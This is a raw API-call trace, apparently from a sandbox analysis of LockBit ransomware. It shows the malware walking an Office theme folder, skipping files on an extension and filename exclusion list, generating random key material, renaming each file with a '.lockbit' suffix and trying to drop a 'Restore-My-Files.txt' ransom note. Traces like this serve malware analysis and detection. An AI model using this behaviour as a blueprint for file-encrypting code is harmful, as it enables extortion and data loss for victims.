[0194.169] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.170] malloc (_Size=0x40068) returned 0x3df0008 [0194.170] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=22417) returned 1 [0194.170] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.170] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.170] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.170] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.170] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.174] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.174] malloc (_Size=0xca) returned 0x1fa2ed8 [0194.174] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xca, FileInformationClass=0xa) returned 0x0 [0194.176] free (_Block=0x1fa2ed8) [0194.176] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.176] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.176] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.176] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72791b00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5a4db00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x72791b00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1e0721, dwReserved0=0x0, dwReserved1=0x0, cFileName="Couture.eftx", cAlternateFileName="COUTUR~1.EFT")) returned 1 [0194.176] lstrcmpiW (lpString1=".", lpString2="Couture.eftx") returned -1 [0194.176] lstrcmpiW (lpString1="..", lpString2="Couture.eftx") returned -1 [0194.176] PathFindExtensionW (pszPath="Couture.eftx") returned=".eftx" [0194.176] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.176] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.177] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.177] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.177] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.177] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.177] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.177] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.177] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.177] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.177] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.177] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.177] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.177] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.178] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Couture.eftx") returned 1 [0194.178] lstrcmpiW (lpString1="ntldr", lpString2="Couture.eftx") returned 1 [0194.178] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Couture.eftx") returned 1 [0194.178] lstrcmpiW (lpString1="bootsect.bak", lpString2="Couture.eftx") returned -1 [0194.178] lstrcmpiW (lpString1="autorun.inf", lpString2="Couture.eftx") returned -1 [0194.178] lstrcmpiW (lpString1="thumbs.db", lpString2="Couture.eftx") returned 1 [0194.178] lstrcmpiW (lpString1="iconcache.db", lpString2="Couture.eftx") returned 1 [0194.178] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.178] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx") returned=".eftx" [0194.178] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.178] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.178] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.178] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.178] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.178] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.178] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.178] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.178] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.178] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.178] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.178] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.179] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.179] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.179] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.179] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx.lockbit") returned 88 [0194.179] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.180] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.180] malloc (_Size=0x40068) returned 0x3df0008 [0194.180] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1967905) returned 1 [0194.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.181] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.181] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.181] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.186] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.186] malloc (_Size=0xc6) returned 0x1fa2ed8 [0194.186] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0194.192] free (_Block=0x1fa2ed8) [0194.192] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.192] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.192] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.194] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x760ca200, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5a99dc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x760ca200, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x4caa1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Elemental.eftx", cAlternateFileName="ELEMEN~1.EFT")) returned 1 [0194.194] lstrcmpiW (lpString1=".", lpString2="Elemental.eftx") returned -1 [0194.194] lstrcmpiW (lpString1="..", lpString2="Elemental.eftx") returned -1 [0194.194] PathFindExtensionW (pszPath="Elemental.eftx") returned=".eftx" [0194.194] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.194] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.194] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.194] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.194] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.194] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.194] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.194] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.194] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.194] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.195] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.195] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.195] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.195] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.195] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.195] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.196] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.196] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.196] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.196] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Elemental.eftx") returned 1 [0194.196] lstrcmpiW (lpString1="ntldr", lpString2="Elemental.eftx") returned 1 [0194.196] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Elemental.eftx") returned 1 [0194.196] lstrcmpiW (lpString1="bootsect.bak", lpString2="Elemental.eftx") returned -1 [0194.196] lstrcmpiW (lpString1="autorun.inf", lpString2="Elemental.eftx") returned -1 [0194.196] lstrcmpiW (lpString1="thumbs.db", lpString2="Elemental.eftx") returned 1 [0194.196] lstrcmpiW (lpString1="iconcache.db", lpString2="Elemental.eftx") returned 1 [0194.196] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.196] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx") returned=".eftx" [0194.196] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.196] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.196] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.196] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.196] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.196] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.196] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.196] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.196] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.196] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.196] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.196] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.196] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.196] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.196] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.196] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.196] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.196] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.196] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.196] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.197] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.197] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.197] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.197] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.197] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.197] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.197] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.197] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.197] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.lockbit") returned 90 [0194.197] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.198] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.198] malloc (_Size=0x40068) returned 0x3df0008 [0194.198] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=314017) returned 1 [0194.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.199] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.200] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.205] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.205] malloc (_Size=0xca) returned 0x1fa2ed8 [0194.205] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xca, FileInformationClass=0xa) returned 0x0 [0194.211] free (_Block=0x1fa2ed8) [0194.211] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.211] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.211] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.211] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd252a00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5abff20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd252a00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x6023, dwReserved0=0x0, dwReserved1=0x0, cFileName="Equity.eftx", cAlternateFileName="EQUITY~1.EFT")) returned 1 [0194.211] lstrcmpiW (lpString1=".", lpString2="Equity.eftx") returned -1 [0194.211] lstrcmpiW (lpString1="..", lpString2="Equity.eftx") returned -1 [0194.212] PathFindExtensionW (pszPath="Equity.eftx") returned=".eftx" [0194.212] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.212] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.212] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.212] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.212] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.212] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.212] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.212] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.212] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.212] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.212] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.212] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.212] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.212] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.213] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 